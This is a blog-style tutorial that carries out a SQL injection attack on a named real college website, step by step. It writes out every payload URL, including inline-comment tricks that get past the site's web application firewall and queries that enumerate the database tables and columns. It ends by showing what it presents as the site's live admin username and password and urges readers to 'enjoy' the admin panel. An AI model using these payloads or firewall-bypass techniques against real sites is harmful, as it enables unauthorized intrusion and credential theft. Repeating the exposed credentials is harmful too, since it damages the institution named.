Breaking News
Loading...

SQLI WAF(Web Application Firewall) Bypassing And Limit Function

06:24
Aslam-0-Alaikum PrOleEetS Sh3ll HaXor Here.. Today  I Am  Gonna Show You About  WAF (Web Application Firewall) And Bypass Of WAF...

Also We Are Gonna Learn About A Little Use Of (LIMIT Function)

Lets Start The Tutorial... :p

We Have A SQLI Vulnerable Website. Lets C...
http://www.scit.edu.in/announce.php?id=14'

As We Can See Site Is Vulneable To Sqli..

Now We Are Gonna Find Coulmn Count For This Web... Lets Find Count... :p

Open Hackbar And Start With order by 100--+

http://www.scit.edu.in/announce.php?id=14' order by 100---+
We Can See Error On The Page....

Now Check With order by 10--+
 
http://www.scit.edu.in/announce.php?id=14' order by 10---+


We Can Still See Error On The Page...

Now Check Order By 4--+

http://www.scit.edu.in/announce.php?id=14' order by 4---+

 Still Error.. Check Wid Order By 3--+

http://www.scit.edu.in/announce.php?id=14' order by 3---+



Now We See That There Is No Error....  Its Mean That Count Is 3

Now Find Vulnerable Column With Union Select Statement.... Lets Check...

http://www.scit.edu.in/announce.php?id=-14' +UNION+ALL+SELECT+1,2,3 --+
As We Can See When We Used Union Select Statement Site Gaves Error "NOT ACCEPTABLE"

It Means That Site Has WAF (Web Application Firewall) Enabled... Now We Have To Bypass It...

WAF can be bypassed with Html Comments Tag Numbers Nd  And Asterik...  (/*!00000  */)

These Are The Qoutes To Bypass WAF...

Now Lets Make Our Query By Putting These Into Our Query...

Lets See...
http://www.scit.edu.in/announce.php?id=-14' +/*!00000UNION*/+ALL+/*!00000SELECT*/+1,2,3 --+


As We Can See Number 2 And 3 On The Page It Means That Vulnerable Columns Are 2 And 3....

Now Lets Start Enumerating Tables By Replacing Column 2 With Our Query In Hackbar...

http://www.scit.edu.in/announce.php?id=-14' +/*!00000UNION*/+ALL+/*!00000SELECT*/+1,concat(table_name),3 from information_schema.tables where table_schema=database() --+

Still Shows The Error... We Have To Use Magic Qoutes (/*! */) With (table_name) (information_schema.tables) and (table_schema) To Bypass It...

Lets C...
http://www.scit.edu.in/announce.php?id=-14' +/*!00000UNION*/+ALL+/*!00000SELECT*/+1,concat/*!(table_name)*/,3 from /*!information_schema.tables*/ where /*!table_schema*/=database() --+

As We Can See Table Name (aca_calendar) On The Site...

To Extract Other Tables We Will Use LIMIT Function (limit 1,1) (limit (2,1) and So On...

Lets C...

http://www.scit.edu.in/announce.php?id=-14' +/*!00000UNION*/+ALL+/*!00000SELECT*/+1,concat/*!(table_name)*/,3 from /*!information_schema.tables*/ where /*!table_schema*/=database() limit 2,1--+ 
As We Can See Second Column In The Table.. Now We Will Keep Using limit Untill We Found Admin Table...

Lets Move On..

http://www.scit.edu.in/announce.php?id=-14' +/*!00000UNION*/+ALL+/*!00000SELECT*/+1,concat/*!(table_name)*/,3 from /*!information_schema.tables*/ where /*!table_schema*/=database() limit 22,1--+  




When We Reached (limit 22,1) We Found Admin Table (myadmin)... 
Remember Table Names Might B Changed In Other Websites....

Now Lets Enumerate Columns From Table (myadmin)..

http://www.scit.edu.in/announce.php?id=-14' +/*!00000UNION*/+ALL+/*!00000SELECT*/+1,concat/*!(column_name)*/,3 from /*!information_schema.columns*/ where /*!table_name*/=0x6d7961646d696e--+ 

 By Executing Our Query We Found Column Name (Id)..

Now We Will Again Use Limit Fucntion To Enuerate Other Columns...

http://www.scit.edu.in/announce.php?id=-14' +/*!00000UNION*/+ALL+/*!00000SELECT*/+1,concat/*!(column_name)*/,3 from /*!information_schema.columns*/ where /*!table_name*/=0x6d7961646d696e limit 1,1--+ 

By Using limit 1,1  We Found  Column Name (UserName)...

http://www.scit.edu.in/announce.php?id=-14' +/*!00000UNION*/+ALL+/*!00000SELECT*/+1,concat/*!(column_name)*/,3 from /*!information_schema.columns*/ where /*!table_name*/=0x6d7961646d696e limit 2,1--+
 

By Using limit 2,1 We Found Column Name (PassWord)...

Now Extract Data From Columns (UerName) And (PassWord) Of Tabel (myadmin)...

http://www.scit.edu.in/announce.php?id=-14' +/*!00000UNION*/+ALL+/*!00000SELECT*/+1,concat/*!(UserName,0x3a,PassWords)*/,3 from myadmin--+


As You Can See We Found Data (info@scit.edu.in:DG9227455664) From Username And Password.. 
Where (info@scit.edu.in) Is Uername And (DG9227455664) Is Password...

Find Admin Panel And Enjoy.. :p


This Was My First Tutorial In Which We Learnt About Byapassing of WAF nd Use Of Limit Function...

Thanks To My Friend ToolKit....

Stay Connected With Us... :p

0 comments:

Post a Comment

 
Toggle Footer